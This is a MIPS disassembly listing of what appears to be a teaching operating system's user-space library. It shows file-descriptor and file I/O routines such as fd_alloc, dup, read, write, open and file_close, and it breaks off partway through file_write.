401afc: 3c080040 lui t0,0x40
401b00: 3c025fc1 lui v0,0x5fc1
401b04: 3447f000 ori a3,v0,0xf000
401b08: 00051582 srl v0,a1,0x16
401b0c: 00021080 sll v0,v0,0x2
401b10: 00c21021 addu v0,a2,v0
401b14: 8c420000 lw v0,0(v0)
401b18: 00000000 nop
401b1c: 30420200 andi v0,v0,0x200
401b20: 14400003 bnez v0,401b30 <fd_alloc+0x40>
401b24: 00000000 nop
401b28: 03e00008 jr ra
401b2c: ac850000 sw a1,0(a0)
401b30: 00051302 srl v0,a1,0xc
401b34: 00021080 sll v0,v0,0x2
401b38: 8d036008 lw v1,24584(t0)
401b3c: 00000000 nop
401b40: 00431021 addu v0,v0,v1
401b44: 8c420000 lw v0,0(v0)
401b48: 00000000 nop
401b4c: 30420200 andi v0,v0,0x200
401b50: 14400004 bnez v0,401b64 <fd_alloc+0x74>
401b54: 24a51000 addiu a1,a1,4096
401b58: 24a5f000 addiu a1,a1,-4096
401b5c: 03e00008 jr ra
401b60: ac850000 sw a1,0(a0)
401b64: 14a7ffe8 bne a1,a3,401b08 <fd_alloc+0x18>
401b68: 2402fff8 li v0,-8
401b6c: 03e00008 jr ra
401b70: 00000000 nop
00401b74 <fd_close>:
401b74: 27bdffe8 addiu sp,sp,-24
401b78: afbf0010 sw ra,16(sp)
401b7c: 00802821 move a1,a0
401b80: 0c100591 jal 401644 <syscall_mem_unmap>
401b84: 00002021 move a0,zero
401b88: 8fbf0010 lw ra,16(sp)
401b8c: 00000000 nop
401b90: 03e00008 jr ra
401b94: 27bd0018 addiu sp,sp,24
00401b98 <fd_lookup>:
401b98: 28820020 slti v0,a0,32
401b9c: 10400010 beqz v0,401be0 <fd_lookup+0x48>
401ba0: 00041b00 sll v1,a0,0xc
401ba4: 3c025fc0 lui v0,0x5fc0
401ba8: 00622021 addu a0,v1,v0
401bac: 00041282 srl v0,a0,0xa
401bb0: 3c030040 lui v1,0x40
401bb4: 8c636008 lw v1,24584(v1)
401bb8: 00000000 nop
401bbc: 00431021 addu v0,v0,v1
401bc0: 8c420000 lw v0,0(v0)
401bc4: 00000000 nop
401bc8: 30420200 andi v0,v0,0x200
401bcc: 10400004 beqz v0,401be0 <fd_lookup+0x48>
401bd0: 00000000 nop
401bd4: aca40000 sw a0,0(a1)
401bd8: 03e00008 jr ra
401bdc: 00001021 move v0,zero
401be0: 03e00008 jr ra
401be4: 2402fffd li v0,-3
00401be8 <fd2data>:
401be8: 27bdffe8 addiu sp,sp,-24
401bec: afbf0010 sw ra,16(sp)
401bf0: 0c100705 jal 401c14 <fd2num>
401bf4: 00000000 nop
401bf8: 00021d80 sll v1,v0,0x16
401bfc: 3c026000 lui v0,0x6000
401c00: 00621021 addu v0,v1,v0
401c04: 8fbf0010 lw ra,16(sp)
401c08: 00000000 nop
401c0c: 03e00008 jr ra
401c10: 27bd0018 addiu sp,sp,24
00401c14 <fd2num>:
401c14: 3c02a040 lui v0,0xa040
401c18: 00821021 addu v0,a0,v0
401c1c: 03e00008 jr ra
401c20: 00021302 srl v0,v0,0xc
00401c24 <num2fd>:
401c24: 00042300 sll a0,a0,0xc
401c28: 3c025fc0 lui v0,0x5fc0
401c2c: 03e00008 jr ra
401c30: 00821021 addu v0,a0,v0
00401c34 <close>:
401c34: 27bdffe0 addiu sp,sp,-32
401c38: afbf001c sw ra,28(sp)
401c3c: afb00018 sw s0,24(sp)
401c40: 0c1006e6 jal 401b98 <fd_lookup>
401c44: 27a50014 addiu a1,sp,20
401c48: 04400011 bltz v0,401c90 <close+0x5c>
401c4c: 00408021 move s0,v0
401c50: 8fa20014 lw v0,20(sp)
401c54: 00000000 nop
401c58: 8c440000 lw a0,0(v0)
401c5c: 0c100694 jal 401a50 <dev_lookup>
401c60: 27a50010 addiu a1,sp,16
401c64: 0440000a bltz v0,401c90 <close+0x5c>
401c68: 00408021 move s0,v0
401c6c: 8fa20010 lw v0,16(sp)
401c70: 00000000 nop
401c74: 8c420010 lw v0,16(v0)
401c78: 8fa40014 lw a0,20(sp)
401c7c: 0040f809 jalr v0
401c80: 00000000 nop
401c84: 8fa40014 lw a0,20(sp)
401c88: 0c1006dd jal 401b74 <fd_close>
401c8c: 00408021 move s0,v0
401c90: 02001021 move v0,s0
401c94: 8fbf001c lw ra,28(sp)
401c98: 8fb00018 lw s0,24(sp)
401c9c: 03e00008 jr ra
401ca0: 27bd0020 addiu sp,sp,32
00401ca4 <close_all>:
401ca4: 27bdffe0 addiu sp,sp,-32
401ca8: afbf0018 sw ra,24(sp)
401cac: afb10014 sw s1,20(sp)
401cb0: afb00010 sw s0,16(sp)
401cb4: 00008021 move s0,zero
401cb8: 24110020 li s1,32
401cbc: 0c10070d jal 401c34 <close>
401cc0: 02002021 move a0,s0
401cc4: 26100001 addiu s0,s0,1
401cc8: 1611fffc bne s0,s1,401cbc <close_all+0x18>
401ccc: 00000000 nop
401cd0: 8fbf0018 lw ra,24(sp)
401cd4: 8fb10014 lw s1,20(sp)
401cd8: 8fb00010 lw s0,16(sp)
401cdc: 03e00008 jr ra
401ce0: 27bd0020 addiu sp,sp,32
00401ce4 <dup>:
401ce4: 27bdffb8 addiu sp,sp,-72
401ce8: afbf0040 sw ra,64(sp)
401cec: afb7003c sw s7,60(sp)
401cf0: afb60038 sw s6,56(sp)
401cf4: afb50034 sw s5,52(sp)
401cf8: afb40030 sw s4,48(sp)
401cfc: afb3002c sw s3,44(sp)
401d00: afb20028 sw s2,40(sp)
401d04: afb10024 sw s1,36(sp)
401d08: afb00020 sw s0,32(sp)
401d0c: 00a0b821 move s7,a1
401d10: 0c1006e6 jal 401b98 <fd_lookup>
401d14: 27a50018 addiu a1,sp,24
401d18: 0440004f bltz v0,401e58 <dup+0x174>
401d1c: 00409821 move s3,v0
401d20: 0c10070d jal 401c34 <close>
401d24: 02e02021 move a0,s7
401d28: 00178300 sll s0,s7,0xc
401d2c: 3c025fc0 lui v0,0x5fc0
401d30: 8fa40018 lw a0,24(sp)
401d34: 0c1006fa jal 401be8 <fd2data>
401d38: 02028021 addu s0,s0,v0
401d3c: 0040a821 move s5,v0
401d40: 0c1006fa jal 401be8 <fd2data>
401d44: 02002021 move a0,s0
401d48: 00409021 move s2,v0
401d4c: 8fa50018 lw a1,24(sp)
401d50: 0200b021 move s6,s0
401d54: 00051302 srl v0,a1,0xc
401d58: 00021080 sll v0,v0,0x2
401d5c: 3c030040 lui v1,0x40
401d60: 8c636008 lw v1,24584(v1)
401d64: 00000000 nop
401d68: 00431021 addu v0,v0,v1
401d6c: 8c420000 lw v0,0(v0)
401d70: 00000000 nop
401d74: 30420604 andi v0,v0,0x604
401d78: afa20010 sw v0,16(sp)
401d7c: 00002021 move a0,zero
401d80: 00003021 move a2,zero
401d84: 0c10057f jal 4015fc <syscall_mem_map>
401d88: 02003821 move a3,s0
401d8c: 04400024 bltz v0,401e20 <dup+0x13c>
401d90: 00409821 move s3,v0
401d94: 00151582 srl v0,s5,0x16
401d98: 00021080 sll v0,v0,0x2
401d9c: 3c030040 lui v1,0x40
401da0: 8c63600c lw v1,24588(v1)
401da4: 00000000 nop
401da8: 00431021 addu v0,v0,v1
401dac: 8c420000 lw v0,0(v0)
401db0: 00000000 nop
401db4: 10400027 beqz v0,401e54 <dup+0x170>
401db8: 00008821 move s1,zero
401dbc: 3c140040 lui s4,0x40
401dc0: 3c100040 lui s0,0x40
401dc4: 02b12821 addu a1,s5,s1
401dc8: 00051302 srl v0,a1,0xc
401dcc: 00021080 sll v0,v0,0x2
401dd0: 8e836008 lw v1,24584(s4)
401dd4: 00000000 nop
401dd8: 00431021 addu v0,v0,v1
401ddc: 8c430000 lw v1,0(v0)
401de0: 00000000 nop
401de4: 30620200 andi v0,v1,0x200
401de8: 10400008 beqz v0,401e0c <dup+0x128>
401dec: 30620604 andi v0,v1,0x604
401df0: afa20010 sw v0,16(sp)
401df4: 00002021 move a0,zero
401df8: 00003021 move a2,zero
401dfc: 0c10057f jal 4015fc <syscall_mem_map>
401e00: 02513821 addu a3,s2,s1
401e04: 04400006 bltz v0,401e20 <dup+0x13c>
401e08: 00409821 move s3,v0
401e0c: 26311000 addiu s1,s1,4096
401e10: 12300010 beq s1,s0,401e54 <dup+0x170>
401e14: 02b12821 addu a1,s5,s1
401e18: 1000ffec b 401dcc <dup+0xe8>
401e1c: 00051302 srl v0,a1,0xc
401e20: 00002021 move a0,zero
401e24: 0c100591 jal 401644 <syscall_mem_unmap>
401e28: 02c02821 move a1,s6
401e2c: 00008021 move s0,zero
401e30: 3c110040 lui s1,0x40
401e34: 00002021 move a0,zero
401e38: 0c100591 jal 401644 <syscall_mem_unmap>
401e3c: 02502821 addu a1,s2,s0
401e40: 26101000 addiu s0,s0,4096
401e44: 12110004 beq s0,s1,401e58 <dup+0x174>
401e48: 00002021 move a0,zero
401e4c: 1000fffa b 401e38 <dup+0x154>
401e50: 00000000 nop
401e54: 02e09821 move s3,s7
401e58: 02601021 move v0,s3
401e5c: 8fbf0040 lw ra,64(sp)
401e60: 8fb7003c lw s7,60(sp)
401e64: 8fb60038 lw s6,56(sp)
401e68: 8fb50034 lw s5,52(sp)
401e6c: 8fb40030 lw s4,48(sp)
401e70: 8fb3002c lw s3,44(sp)
401e74: 8fb20028 lw s2,40(sp)
401e78: 8fb10024 lw s1,36(sp)
401e7c: 8fb00020 lw s0,32(sp)
401e80: 03e00008 jr ra
401e84: 27bd0048 addiu sp,sp,72
00401e88 <read>:
401e88: 27bdffd8 addiu sp,sp,-40
401e8c: afbf0024 sw ra,36(sp)
401e90: afb20020 sw s2,32(sp)
401e94: afb1001c sw s1,28(sp)
401e98: afb00018 sw s0,24(sp)
401e9c: 00809021 move s2,a0
401ea0: 00a08021 move s0,a1
401ea4: 00c08821 move s1,a2
401ea8: 0c1006e6 jal 401b98 <fd_lookup>
401eac: 27a50014 addiu a1,sp,20
401eb0: 04400028 bltz v0,401f54 <read+0xcc>
401eb4: 00402021 move a0,v0
401eb8: 8fa20014 lw v0,20(sp)
401ebc: 00000000 nop
401ec0: 8c440000 lw a0,0(v0)
401ec4: 0c100694 jal 401a50 <dev_lookup>
401ec8: 27a50010 addiu a1,sp,16
401ecc: 04400021 bltz v0,401f54 <read+0xcc>
401ed0: 00402021 move a0,v0
401ed4: 8fa70014 lw a3,20(sp)
401ed8: 00000000 nop
401edc: 8ce20008 lw v0,8(a3)
401ee0: 00000000 nop
401ee4: 30420003 andi v0,v0,0x3
401ee8: 24030001 li v1,1
401eec: 1443000a bne v0,v1,401f18 <read+0x90>
401ef0: 02002821 move a1,s0
401ef4: 3c020041 lui v0,0x41
401ef8: 8c428004 lw v0,-32764(v0)
401efc: 3c040040 lui a0,0x40
401f00: 248474a4 addiu a0,a0,29860
401f04: 8c4500a4 lw a1,164(v0)
401f08: 0c100086 jal 400218 <writef>
401f0c: 02403021 move a2,s2
401f10: 10000010 b 401f54 <read+0xcc>
401f14: 2404fffd li a0,-3
401f18: 8fa20010 lw v0,16(sp)
401f1c: 00000000 nop
401f20: 8c420008 lw v0,8(v0)
401f24: 00e02021 move a0,a3
401f28: 8ce70004 lw a3,4(a3)
401f2c: 0040f809 jalr v0
401f30: 02203021 move a2,s1
401f34: 04400007 bltz v0,401f54 <read+0xcc>
401f38: 00402021 move a0,v0
401f3c: 8fa30014 lw v1,20(sp)
401f40: 00000000 nop
401f44: 8c620004 lw v0,4(v1)
401f48: 00000000 nop
401f4c: 00821021 addu v0,a0,v0
401f50: ac620004 sw v0,4(v1)
401f54: 00801021 move v0,a0
401f58: 8fbf0024 lw ra,36(sp)
401f5c: 8fb20020 lw s2,32(sp)
401f60: 8fb1001c lw s1,28(sp)
401f64: 8fb00018 lw s0,24(sp)
401f68: 03e00008 jr ra
401f6c: 27bd0028 addiu sp,sp,40
00401f70 <readn>:
401f70: 27bdffd8 addiu sp,sp,-40
401f74: afbf0020 sw ra,32(sp)
401f78: afb3001c sw s3,28(sp)
401f7c: afb20018 sw s2,24(sp)
401f80: afb10014 sw s1,20(sp)
401f84: afb00010 sw s0,16(sp)
401f88: 00809821 move s3,a0
401f8c: 00a09021 move s2,a1
401f90: 14c00003 bnez a2,401fa0 <readn+0x30>
401f94: 00c08821 move s1,a2
401f98: 10000010 b 401fdc <readn+0x6c>
401f9c: 00001021 move v0,zero
401fa0: 00008021 move s0,zero
401fa4: 00001821 move v1,zero
401fa8: 02602021 move a0,s3
401fac: 02432821 addu a1,s2,v1
401fb0: 0c1007a2 jal 401e88 <read>
401fb4: 02233023 subu a2,s1,v1
401fb8: 04400008 bltz v0,401fdc <readn+0x6c>
401fbc: 00000000 nop
401fc0: 10400005 beqz v0,401fd8 <readn+0x68>
401fc4: 00000000 nop
401fc8: 02028021 addu s0,s0,v0
401fcc: 0211102b sltu v0,s0,s1
401fd0: 1440fff5 bnez v0,401fa8 <readn+0x38>
401fd4: 02001821 move v1,s0
401fd8: 02001021 move v0,s0
401fdc: 8fbf0020 lw ra,32(sp)
401fe0: 8fb3001c lw s3,28(sp)
401fe4: 8fb20018 lw s2,24(sp)
401fe8: 8fb10014 lw s1,20(sp)
401fec: 8fb00010 lw s0,16(sp)
401ff0: 03e00008 jr ra
401ff4: 27bd0028 addiu sp,sp,40
00401ff8 <write>:
401ff8: 27bdffd8 addiu sp,sp,-40
401ffc: afbf0024 sw ra,36(sp)
402000: afb20020 sw s2,32(sp)
402004: afb1001c sw s1,28(sp)
402008: afb00018 sw s0,24(sp)
40200c: 00809021 move s2,a0
402010: 00a08021 move s0,a1
402014: 00c08821 move s1,a2
402018: 0c1006e6 jal 401b98 <fd_lookup>
40201c: 27a50014 addiu a1,sp,20
402020: 04400027 bltz v0,4020c0 <write+0xc8>
402024: 00402021 move a0,v0
402028: 8fa20014 lw v0,20(sp)
40202c: 00000000 nop
402030: 8c440000 lw a0,0(v0)
402034: 0c100694 jal 401a50 <dev_lookup>
402038: 27a50010 addiu a1,sp,16
40203c: 04400020 bltz v0,4020c0 <write+0xc8>
402040: 00402021 move a0,v0
402044: 8fa30014 lw v1,20(sp)
402048: 00000000 nop
40204c: 8c620008 lw v0,8(v1)
402050: 00000000 nop
402054: 30420003 andi v0,v0,0x3
402058: 1440000a bnez v0,402084 <write+0x8c>
40205c: 02002821 move a1,s0
402060: 3c020041 lui v0,0x41
402064: 8c428004 lw v0,-32764(v0)
402068: 3c040040 lui a0,0x40
40206c: 248474c0 addiu a0,a0,29888
402070: 8c4500a4 lw a1,164(v0)
402074: 0c100086 jal 400218 <writef>
402078: 02403021 move a2,s2
40207c: 10000010 b 4020c0 <write+0xc8>
402080: 2404fffd li a0,-3
402084: 8fa20010 lw v0,16(sp)
402088: 00000000 nop
40208c: 8c42000c lw v0,12(v0)
402090: 00602021 move a0,v1
402094: 8c670004 lw a3,4(v1)
402098: 0040f809 jalr v0
40209c: 02203021 move a2,s1
4020a0: 18400007 blez v0,4020c0 <write+0xc8>
4020a4: 00402021 move a0,v0
4020a8: 8fa30014 lw v1,20(sp)
4020ac: 00000000 nop
4020b0: 8c620004 lw v0,4(v1)
4020b4: 00000000 nop
4020b8: 00821021 addu v0,a0,v0
4020bc: ac620004 sw v0,4(v1)
4020c0: 00801021 move v0,a0
4020c4: 8fbf0024 lw ra,36(sp)
4020c8: 8fb20020 lw s2,32(sp)
4020cc: 8fb1001c lw s1,28(sp)
4020d0: 8fb00018 lw s0,24(sp)
4020d4: 03e00008 jr ra
4020d8: 27bd0028 addiu sp,sp,40
004020dc <seek>:
4020dc: 27bdffe0 addiu sp,sp,-32
4020e0: afbf001c sw ra,28(sp)
4020e4: afb00018 sw s0,24(sp)
4020e8: 00a08021 move s0,a1
4020ec: 0c1006e6 jal 401b98 <fd_lookup>
4020f0: 27a50010 addiu a1,sp,16
4020f4: 04400005 bltz v0,40210c <seek+0x30>
4020f8: 00000000 nop
4020fc: 8fa20010 lw v0,16(sp)
402100: 00000000 nop
402104: ac500004 sw s0,4(v0)
402108: 00001021 move v0,zero
40210c: 8fbf001c lw ra,28(sp)
402110: 8fb00018 lw s0,24(sp)
402114: 03e00008 jr ra
402118: 27bd0020 addiu sp,sp,32
0040211c <fstat>:
40211c: 27bdffe0 addiu sp,sp,-32
402120: afbf001c sw ra,28(sp)
402124: afb00018 sw s0,24(sp)
402128: 00a08021 move s0,a1
40212c: 0c1006e6 jal 401b98 <fd_lookup>
402130: 27a50014 addiu a1,sp,20
402134: 04400012 bltz v0,402180 <fstat+0x64>
402138: 00000000 nop
40213c: 8fa20014 lw v0,20(sp)
402140: 00000000 nop
402144: 8c440000 lw a0,0(v0)
402148: 0c100694 jal 401a50 <dev_lookup>
40214c: 27a50010 addiu a1,sp,16
402150: 0440000b bltz v0,402180 <fstat+0x64>
402154: 00000000 nop
402158: a2000000 sb zero,0(s0)
40215c: ae000080 sw zero,128(s0)
402160: ae000084 sw zero,132(s0)
402164: 8fa20010 lw v0,16(sp)
402168: 00000000 nop
40216c: ae020088 sw v0,136(s0)
402170: 8c420014 lw v0,20(v0)
402174: 8fa40014 lw a0,20(sp)
402178: 0040f809 jalr v0
40217c: 02002821 move a1,s0
402180: 8fbf001c lw ra,28(sp)
402184: 8fb00018 lw s0,24(sp)
402188: 03e00008 jr ra
40218c: 27bd0020 addiu sp,sp,32
00402190 <stat>:
402190: 27bdffe0 addiu sp,sp,-32
402194: afbf0018 sw ra,24(sp)
402198: afb10014 sw s1,20(sp)
40219c: afb00010 sw s0,16(sp)
4021a0: 00a08021 move s0,a1
4021a4: 0c1008a0 jal 402280 <open>
4021a8: 00002821 move a1,zero
4021ac: 04400008 bltz v0,4021d0 <stat+0x40>
4021b0: 00408821 move s1,v0
4021b4: 00402021 move a0,v0
4021b8: 0c100847 jal 40211c <fstat>
4021bc: 02002821 move a1,s0
4021c0: 00408021 move s0,v0
4021c4: 0c10070d jal 401c34 <close>
4021c8: 02202021 move a0,s1
4021cc: 02008821 move s1,s0
4021d0: 02201021 move v0,s1
4021d4: 8fbf0018 lw ra,24(sp)
4021d8: 8fb10014 lw s1,20(sp)
4021dc: 8fb00010 lw s0,16(sp)
4021e0: 03e00008 jr ra
4021e4: 27bd0020 addiu sp,sp,32
...
004021f0 <pageref>:
4021f0: 00041582 srl v0,a0,0x16
4021f4: 00021080 sll v0,v0,0x2
4021f8: 3c030040 lui v1,0x40
4021fc: 8c63600c lw v1,24588(v1)
402200: 00000000 nop
402204: 00431021 addu v0,v0,v1
402208: 8c420000 lw v0,0(v0)
40220c: 00000000 nop
402210: 30420200 andi v0,v0,0x200
402214: 10400016 beqz v0,402270 <pageref+0x80>
402218: 3c030040 lui v1,0x40
40221c: 00041302 srl v0,a0,0xc
402220: 00021080 sll v0,v0,0x2
402224: 8c636008 lw v1,24584(v1)
402228: 00000000 nop
40222c: 00431021 addu v0,v0,v1
402230: 8c440000 lw a0,0(v0)
402234: 00000000 nop
402238: 30820200 andi v0,a0,0x200
40223c: 1040000c beqz v0,402270 <pageref+0x80>
402240: 00000000 nop
402244: 00041302 srl v0,a0,0xc
402248: 00021880 sll v1,v0,0x2
40224c: 00021100 sll v0,v0,0x4
402250: 00431023 subu v0,v0,v1
402254: 3c030040 lui v1,0x40
402258: 8c636004 lw v1,24580(v1)
40225c: 00000000 nop
402260: 00431021 addu v0,v0,v1
402264: 94420008 lhu v0,8(v0)
402268: 03e00008 jr ra
40226c: 00000000 nop
402270: 03e00008 jr ra
402274: 00001021 move v0,zero
...
00402280 <open>:
402280: 27bdffd0 addiu sp,sp,-48
402284: afbf002c sw ra,44(sp)
402288: afb40028 sw s4,40(sp)
40228c: afb30024 sw s3,36(sp)
402290: afb20020 sw s2,32(sp)
402294: afb1001c sw s1,28(sp)
402298: afb00018 sw s0,24(sp)
40229c: 00809021 move s2,a0
4022a0: 00a08821 move s1,a1
4022a4: 0c1006bc jal 401af0 <fd_alloc>
4022a8: 27a40010 addiu a0,sp,16
4022ac: 04410006 bgez v0,4022c8 <open+0x48>
4022b0: 00408021 move s0,v0
4022b4: 3c040040 lui a0,0x40
4022b8: 0c100086 jal 400218 <writef>
4022bc: 248474e8 addiu a0,a0,29928
4022c0: 1000002f b 402380 <open+0x100>
4022c4: 02001021 move v0,s0
4022c8: 02402021 move a0,s2
4022cc: 8fa60010 lw a2,16(sp)
4022d0: 0c100aed jal 402bb4 <fsipc_open>
4022d4: 02202821 move a1,s1
4022d8: 04410007 bgez v0,4022f8 <open+0x78>
4022dc: 00408021 move s0,v0
4022e0: 3c040040 lui a0,0x40
4022e4: 24847500 addiu a0,a0,29952
4022e8: 0c100086 jal 400218 <writef>
4022ec: 02402821 move a1,s2
4022f0: 10000023 b 402380 <open+0x100>
4022f4: 02001021 move v0,s0
4022f8: 8fa40010 lw a0,16(sp)
4022fc: 0c1006fa jal 401be8 <fd2data>
402300: 00000000 nop
402304: 8fa40010 lw a0,16(sp)
402308: 00000000 nop
40230c: 8c920090 lw s2,144(a0)
402310: 8c93000c lw s3,12(a0)
402314: 1640000a bnez s2,402340 <open+0xc0>
402318: 0040a021 move s4,v0
40231c: 0c100705 jal 401c14 <fd2num>
402320: 00000000 nop
402324: 10000015 b 40237c <open+0xfc>
402328: 00408021 move s0,v0
40232c: 3c040040 lui a0,0x40
402330: 0c100086 jal 400218 <writef>
402334: 24847518 addiu a0,a0,29976
402338: 10000011 b 402380 <open+0x100>
40233c: 02001021 move v0,s0
402340: 00008821 move s1,zero
402344: 02602021 move a0,s3
402348: 02202821 move a1,s1
40234c: 0c100b0c jal 402c30 <fsipc_map>
402350: 02343021 addu a2,s1,s4
402354: 0440fff5 bltz v0,40232c <open+0xac>
402358: 00408021 move s0,v0
40235c: 26311000 addiu s1,s1,4096
402360: 0232102b sltu v0,s1,s2
402364: 1440fff8 bnez v0,402348 <open+0xc8>
402368: 02602021 move a0,s3
40236c: 8fa40010 lw a0,16(sp)
402370: 0c100705 jal 401c14 <fd2num>
402374: 00000000 nop
402378: 00408021 move s0,v0
40237c: 02001021 move v0,s0
402380: 8fbf002c lw ra,44(sp)
402384: 8fb40028 lw s4,40(sp)
402388: 8fb30024 lw s3,36(sp)
40238c: 8fb20020 lw s2,32(sp)
402390: 8fb1001c lw s1,28(sp)
402394: 8fb00018 lw s0,24(sp)
402398: 03e00008 jr ra
40239c: 27bd0030 addiu sp,sp,48
004023a0 <file_close>:
4023a0: 27bdffd8 addiu sp,sp,-40
4023a4: afbf0020 sw ra,32(sp)
4023a8: afb3001c sw s3,28(sp)
4023ac: afb20018 sw s2,24(sp)
4023b0: afb10014 sw s1,20(sp)
4023b4: afb00010 sw s0,16(sp)
4023b8: 8c91000c lw s1,12(a0)
4023bc: 8c920090 lw s2,144(a0)
4023c0: 0c1006fa jal 401be8 <fd2data>
4023c4: 00000000 nop
4023c8: 12400009 beqz s2,4023f0 <file_close+0x50>
4023cc: 00409821 move s3,v0
4023d0: 00008021 move s0,zero
4023d4: 02202021 move a0,s1
4023d8: 0c100b46 jal 402d18 <fsipc_dirty>
4023dc: 02002821 move a1,s0
4023e0: 26101000 addiu s0,s0,4096
4023e4: 0212102b sltu v0,s0,s2
4023e8: 1440fffb bnez v0,4023d8 <file_close+0x38>
4023ec: 02202021 move a0,s1
4023f0: 0c100b39 jal 402ce4 <fsipc_close>
4023f4: 02202021 move a0,s1
4023f8: 0441000b bgez v0,402428 <file_close+0x88>
4023fc: 00408021 move s0,v0
402400: 3c040040 lui a0,0x40
402404: 0c100086 jal 400218 <writef>
402408: 24847530 addiu a0,a0,30000
40240c: 10000013 b 40245c <file_close+0xbc>
402410: 02001021 move v0,s0
402414: 3c040040 lui a0,0x40
402418: 0c100086 jal 400218 <writef>
40241c: 24847548 addiu a0,a0,30024
402420: 1000000e b 40245c <file_close+0xbc>
402424: 02001021 move v0,s0
402428: 1240000a beqz s2,402454 <file_close+0xb4>
40242c: 00008821 move s1,zero
402430: 00002021 move a0,zero
402434: 0c100591 jal 401644 <syscall_mem_unmap>
402438: 02332821 addu a1,s1,s3
40243c: 0440fff5 bltz v0,402414 <file_close+0x74>
402440: 00408021 move s0,v0
402444: 26311000 addiu s1,s1,4096
402448: 0232102b sltu v0,s1,s2
40244c: 1440fff9 bnez v0,402434 <file_close+0x94>
402450: 00002021 move a0,zero
402454: 00008021 move s0,zero
402458: 02001021 move v0,s0
40245c: 8fbf0020 lw ra,32(sp)
402460: 8fb3001c lw s3,28(sp)
402464: 8fb20018 lw s2,24(sp)
402468: 8fb10014 lw s1,20(sp)
40246c: 8fb00010 lw s0,16(sp)
402470: 03e00008 jr ra
402474: 27bd0028 addiu sp,sp,40
00402478 <file_read>:
402478: 27bdffe0 addiu sp,sp,-32
40247c: afbf001c sw ra,28(sp)
402480: afb20018 sw s2,24(sp)
402484: afb10014 sw s1,20(sp)
402488: afb00010 sw s0,16(sp)
40248c: 00a09021 move s2,a1
402490: 00c08021 move s0,a2
402494: 8c830090 lw v1,144(a0)
402498: 00000000 nop
40249c: 0067102b sltu v0,v1,a3
4024a0: 10400003 beqz v0,4024b0 <file_read+0x38>
4024a4: 00e08821 move s1,a3
4024a8: 1000000d b 4024e0 <file_read+0x68>
4024ac: 00001021 move v0,zero
4024b0: 00e61021 addu v0,a3,a2
4024b4: 0062102b sltu v0,v1,v0
4024b8: 10400002 beqz v0,4024c4 <file_read+0x4c>
4024bc: 00000000 nop
4024c0: 00678023 subu s0,v1,a3
4024c4: 0c1006fa jal 401be8 <fd2data>
4024c8: 00000000 nop
4024cc: 00512021 addu a0,v0,s1
4024d0: 02402821 move a1,s2
4024d4: 0c100322 jal 400c88 <user_bcopy>
4024d8: 02003021 move a2,s0
4024dc: 02001021 move v0,s0
4024e0: 8fbf001c lw ra,28(sp)
4024e4: 8fb20018 lw s2,24(sp)
4024e8: 8fb10014 lw s1,20(sp)
4024ec: 8fb00010 lw s0,16(sp)
4024f0: 03e00008 jr ra
4024f4: 27bd0020 addiu sp,sp,32
004024f8 <read_map>:
4024f8: 27bdffd8 addiu sp,sp,-40
4024fc: afbf0020 sw ra,32(sp)
402500: afb1001c sw s1,28(sp)
402504: afb00018 sw s0,24(sp)
402508: 00a08021 move s0,a1
40250c: 00c08821 move s1,a2
402510: 0c1006e6 jal 401b98 <fd_lookup>
402514: 27a50010 addiu a1,sp,16
402518: 04400029 bltz v0,4025c0 <read_map+0xc8>
40251c: 3c030040 lui v1,0x40
402520: 8fa40010 lw a0,16(sp)
402524: 00000000 nop
402528: 8c820000 lw v0,0(a0)
40252c: 8c637620 lw v1,30240(v1)
402530: 00000000 nop
402534: 14430022 bne v0,v1,4025c0 <read_map+0xc8>
402538: 2402fffd li v0,-3
40253c: 0c1006fa jal 401be8 <fd2data>
402540: 00000000 nop
402544: 00502021 addu a0,v0,s0
402548: 3c02003f lui v0,0x3f
40254c: 3442ffff ori v0,v0,0xffff
402550: 0050102b sltu v0,v0,s0
402554: 1440001a bnez v0,4025c0 <read_map+0xc8>
402558: 2402fff9 li v0,-7
40255c: 00041582 srl v0,a0,0x16
402560: 00021080 sll v0,v0,0x2
402564: 3c030040 lui v1,0x40
402568: 8c63600c lw v1,24588(v1)
40256c: 00000000 nop
402570: 00431021 addu v0,v0,v1
402574: 8c420000 lw v0,0(v0)
402578: 00000000 nop
40257c: 30420200 andi v0,v0,0x200
402580: 1040000f beqz v0,4025c0 <read_map+0xc8>
402584: 2402fff9 li v0,-7
402588: 00041302 srl v0,a0,0xc
40258c: 00021080 sll v0,v0,0x2
402590: 3c030040 lui v1,0x40
402594: 8c636008 lw v1,24584(v1)
402598: 00000000 nop
40259c: 00431021 addu v0,v0,v1
4025a0: 8c420000 lw v0,0(v0)
4025a4: 00000000 nop
4025a8: 30420200 andi v0,v0,0x200
4025ac: 10400003 beqz v0,4025bc <read_map+0xc4>
4025b0: 00001021 move v0,zero
4025b4: 10000002 b 4025c0 <read_map+0xc8>
4025b8: ae240000 sw a0,0(s1)
4025bc: 2402fff9 li v0,-7
4025c0: 8fbf0020 lw ra,32(sp)
4025c4: 8fb1001c lw s1,28(sp)
4025c8: 8fb00018 lw s0,24(sp)
4025cc: 03e00008 jr ra
4025d0: 27bd0028 addiu sp,sp,40
004025d4 <file_write>:
4025d4: 27bdffd8 addiu sp,sp,-40
4025d8: afbf0024 sw ra,36(sp)
4025dc: afb40020 sw s4,32(sp)
4025e0: afb3001c sw s3,28(sp)
4025e4: afb20018 sw s2,24(sp)
4025e8: afb10014 sw s1,20(sp)
4025ec: afb00010 sw s0,16(sp)
4025f0: 00808821 move s1,a0
4025f4: 00a0a021 move s4,a1
4025f8: 00c09021 move s2,a2
4025fc: 00e68021 addu s0,a3,a2
402600: 3c020040 lui v0,0x40
402604: 0050102b sltu v0,v0,s0
402608: 10400003 beqz v0,402618 <file_write+0x44>
40260c: 00e09821 move s3,a3
402610: 10000014 b 402664 <file_write+0x90>
402614: 2402fff9 li v0,-7
402618: 8c820090 lw v0,144(a0)
40261c: 00000000 nop
402620: 0050102b sltu v0,v0,s0
402624: 10400008 beqz v0,402648 <file_write+0x74>
402628: 00000000 nop
40262c: 0c100705 jal 401c14 <fd2num>
402630: 00000000 nop
402634: 00402021 move a0,v0
402638: 0c1009b8 jal 4026e0 <ftruncate>
40263c: 02002821 move a1,s0
402640: 04400008 bltz v0,402664 <file_write+0x90>
402644: 00000000 nop
402648: 0c1006fa jal 401be8 <fd2data>
40264c: 02202021 move a0,s1
402650: 02802021 move a0,s4
402654: 00532821 addu a1,v0,s3
402658: 0c100322 jal 400c88 <user_bcopy>
40265c: 02403021 move a2,s2
402660: 02401021 move v0,s2
402664: 8fbf0024 lw ra,36(sp)
402668: 8fb40020 lw s4,32(sp)
40266c: 8fb3001c lw s3,28(sp)
402670: 8fb20018 lw s2,24(sp)
